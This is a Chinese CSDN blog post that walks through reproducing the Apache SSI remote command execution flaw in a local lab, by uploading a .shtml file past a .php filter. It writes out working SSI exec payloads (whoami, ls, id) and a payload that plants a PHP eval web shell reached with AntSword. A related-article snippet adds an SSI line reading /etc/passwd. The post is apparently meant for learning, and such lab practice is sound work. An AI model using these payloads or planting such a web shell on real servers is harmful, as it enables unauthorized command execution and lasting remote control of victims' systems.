apache ssi 远程命令执行漏洞复现

最新推荐文章于 2024-09-20 16:11:45 发布
最新推荐文章于 2024-09-20 16:11:45 发布
阅读量142 收藏
点赞数
文章标签: 安全漏洞 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyh0519111/article/details/118108359
版权
本文介绍了当服务器过滤.php文件但支持.shtml和SSI/CGI时,如何通过上传包含<!--#execcmd=...-->的.shtml文件执行任意命令。演示了上传和执行whoami、ls、id命令的过程,以及如何利用此漏洞创建并执行PHP代码,最终通过蚁剑建立连接。
摘要由CSDN通过智能技术生成

在测试任意文件上传时,如果目标服务器对.php文件进行了过滤,但是开启了ssi和cgi的支持,则可上传一个.shtml文件,利用<!--#exec cmd="id" -->语法执行任意命令。

其中id可以任意改变。

进入漏洞环境->拉取环境->访问localhost:8080/upload.php

上传写好的.shtml文件内容为:

<!--#exec cmd="whoami" -->

<!--#exec cmd=”ls” -->

<!--#exec cmd=”id” -->

上传后访问shell.shtml文件

重新写入命令

<!--#exec cmd=”echo ‘<?php @eval($_POST[1]);?>’ > shell.php” -->

<!--#exec cmd=”ls” -->

上传后访问shell.shtml

使用蚁剑连接,尝试创建test.php文件成功。

老北京砸酱锤
关注
Apache默认是不支持SSI如何给Apache增加SSI支持
09-15
需要注意的是,由于SSI是基于文件系统的,它可能会带来安全风险,比如允许恶意用户通过SSI漏洞执行任意命令。因此,在启用SSI时,一定要确保你的网站目录权限设置得当,避免敏感信息泄露或被恶意利用。 总的来说,...
ssi注入
qq_44832048的博客
06-13 520
ssi注入就是寻找一个输入点输入类似<!--#exec cmd="命令" --> 格式,看看能不能运行系统命令。 如<!--#exec cmd="ls" --><!--#exec cmd="cat /etc/passwd" --> 切换目录<!--#exec cmd="cd /root/dir/" --> 像正常一样先ifco...
新翔OA漏洞复现
最新发布
m0_62501867的博客
09-20 591
菜鸡的日常记录,各位大佬别喷。
Apache SSI 远程命令执行漏洞SSI注入漏洞
qq_45521281的博客
07-25 3251
SSI 服务器端包含 SSI(server-side includes)能帮我们实现什么功能: SSI提供了一种对现有HTML文档增加动态内容的方法,即在html中加入动态内容。 SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意命令。 在测试任意文件上传漏洞的时候,目标
漏洞复现-Apache SSI 远程命令执行漏洞
网安小白的博客
02-20 258
Apache SSI 远程命令执行漏洞复现
Apache SSI 远程命令执行漏洞复现
weixin_53872203的博客
03-14 147
漏洞复现
配置Apache支持shtml(SSI)的方法
09-15
这三行分别表示加载ssi_module模块,指定.shtml文件类型为HTML并启用包含过滤器,使得Apache在处理.shtml文件时执行SSI指令。 如果你希望全局开启SSI,即所有站点都支持,可以将上述配置添加到`httpd.conf`的适当...
apache SSI教程文档
10-24
Apache服务器上启用SSI,首先需要确保Apache已经正确安装。如描述中所述,可以在Apache的配置文件`httpd.conf`中添加特定的指令来开启SSI支持。在相应目录配置段中添加`AddType text/html .ssi`以声明`.ssi`文件...
apache SHTML网页SSI使用详解
01-11
方法一:下面是详细的设置apache支持shtml的设置步骤开启includes模块运行shtml 0、开启php环境安装目录 (我的为D:\wamp\Apache2\conf下) 的httpd.conf 文件中的(大概408-409行处): 1、 AddType text/...
Apache 支持CGI程序和SSI程序的设置方法
09-16
SSI则是一种服务器端脚本技术,它可以动态地插入文件、时间戳、执行命令或者根据用户请求生成内容。 要使Apache支持CGI和SSI,首先需要确保Apache在安装时包含了必要的模块。`mod_include`负责处理SSI,而`mod_...
Apache SSI 远程命令执行漏洞 漏洞复现
鸥鹭忘机
09-30 788
前言&原理 如果目标服务器开启了ssi功能,那么shtml文件将可以执行任意命令。如果上传文件程序限制了php文件的上传,且没有限制shtml文件上传,我们可以上传一个shtml文件,并利用<!--#exec cmd="命令" -->语法执行任意命令ssi详细讲解请参考:https://blog.csdn.net/weixin_30399871/article/details/94779816,什么是SSIssi漏洞挖掘思路请参考:https://blog.csdn.net/q
【网络安全---漏洞复现】shiro550反序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程)
m0_67844671的博客
09-21 5488
shiro550反序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程);Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序;
Redis 未授权访问 CNNVD-201511-230 漏洞复现
Senimo
05-03 2109
CNNVD-201511-230 Redis 未授权访问漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接六、利用工具 一、漏洞描述 Redis 是美国 RedisLabs 公司赞助的一套开源的使用 ANSIC 编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的 API。Redis 中存在未授权访问漏洞,该漏洞源于程序在默认配置下会绑定在 6379 端口,这导致其直接暴露在公网中,可以接受来自任何地址发来的请求。当程序
永恒之蓝 MS17-010 漏洞复现
Nobug_的博客
06-16 916
永恒之蓝 MS17-010 漏洞复现 文章目录永恒之蓝 MS17-010 漏洞复现前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.
漏洞复现
qq_44813849的博客
07-19 5751
CMS漏洞复现 CMS是"Content Management System"的缩写,意为"内容管理系统"。 网站的开发者为了方便,制作了不同种类的CMS,可以加快网站开发的速度和减少开发的成本。 常见cms 环境搭建 CMS官网CMS 网站源码下载源码 下载好后放到本地WWW目录下,然后开启PHPstudy,在浏览器访问 点击我已阅读并继续。然后是环境检测,保存默认即可 接下来是参数配置,需要设...
【CVE-2021-3156】——漏洞复现、原理分析以及漏洞修复
IronmanJay
06-01 4060
2021年01月27日,RedHat官方发布了Sudo缓冲区/栈溢出漏洞的风险通告,普通用户可以通过利用此漏洞,而无需进行身份验证,成功获取Root权限。
【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细)
热门推荐
m0_67844671的博客
09-12 1万+
Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细);Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。AJP(Apache JServ Protocol)是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。WEB服务器通过 TCP连接
Vulfocus靶场漏洞复现系列—1
tlovejr的博客
03-02 6034
文章目录 前言 一、pandas是什么? 二、使用步骤 总结 前言 接下来会给大家介绍一些最常见的复现漏洞过程,我所用的是Vulfocus靶场,靶场安装方法已经在上一篇文章讲过,大家可以自行去观看。如果大家想及时获取最新漏洞消息,大家可以直接cnvdhttps://www.cnvd.org.cn/去查看即可,小白入门,如果在博客中有什么错误,还请各位大佬指出。 一、Drupal远程代码执行漏(CVE-2019-6340) 1、漏洞介绍 Drupal官方之前更新了一个非常关键的安全补丁,
Apache SSI教程:实战与配置详解
安装后,用户可以根据官方文档自定义配置,但教程主要关注如何在Apache的配置文件(如`httpd.conf`)中添加必要的指令来支持SSI,如添加`AddType`、`Options`和`AddOutputFilter`等,以便处理`.ssi`类型的HTML文件,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值